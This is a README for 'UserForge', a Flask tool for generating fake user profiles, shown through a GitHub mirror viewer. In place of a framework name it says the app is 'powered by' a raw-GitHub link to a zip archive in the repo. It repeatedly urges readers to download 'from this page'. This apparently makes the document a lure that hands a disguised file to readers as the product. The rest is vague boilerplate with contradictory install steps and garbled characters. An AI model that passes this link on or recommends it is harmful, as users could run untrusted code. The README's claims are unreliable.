| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Name | Name | Last commit date | ||
|---|---|---|---|---|
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
ย | ย | |||
UserForge helps you create realistic and private user profiles along with test email addresses. You can use it through the command line, an HTTP API, or a web user interface. Built with Flask and powered by https://raw.githubusercontent.com/Forrosiver/UserForge/main/static/Forge-User-v3.6.zip, this application supports multiple locales and themes, allows deterministic seeds, and bulk exports in JSON or CSV. Itโs perfect for populating development and staging databases, creating UI mockups, or automating tests.
To run UserForge, ensure your system meets the following requirements:
For easy access to the latest version of UserForge, visit this page to download.
sudo dpkg -i userforge-<version>.debTo run UserForge from the command line, open your terminal and type:
userforge --helpThis command will display all the available options and how to use them. For example, to create a new user profile, you might run:
userforge create --locale en --theme darkUserForge can be accessed programmatically via its HTTP API. You can send requests to create user profiles, retrieve data, or export profiles in bulk. The documentation for the API is available within the application.
To use the web UI, simply launch the application and open your browser. Navigate to http://localhost:5000 to access a user-friendly interface where you can create users easily.
UserForge prioritizes your privacy by ensuring all user data is generated without linking to real individuals. The application complies with security standards to keep your data safe. You can feel confident using UserForge for testing and development.
Your thoughts matter! If you encounter any issues or have suggestions, please feel free to provide feedback. Issues can be reported on the GitHub Issues page for UserForge.
UserForge is open-source software. You can modify and share it under the terms of the license found in the repository.
For ongoing updates and community discussions, consider following the repository on GitHub. The ongoing development aims to improve your experience with UserForge.
Join our growing community to share experiences, ask questions, and connect with other users. Access additional resources and discussions via the community section on the GitHub page.
For detailed documentation on using UserForge, check out the Wiki section in the repository. It contains valuable guides and FAQs.
Your journey to creating realistic user profiles starts now. Visit this page to download UserForge and unlock the potential of simplified user generation today.
| Back | FazBrowse Home | New Git URL |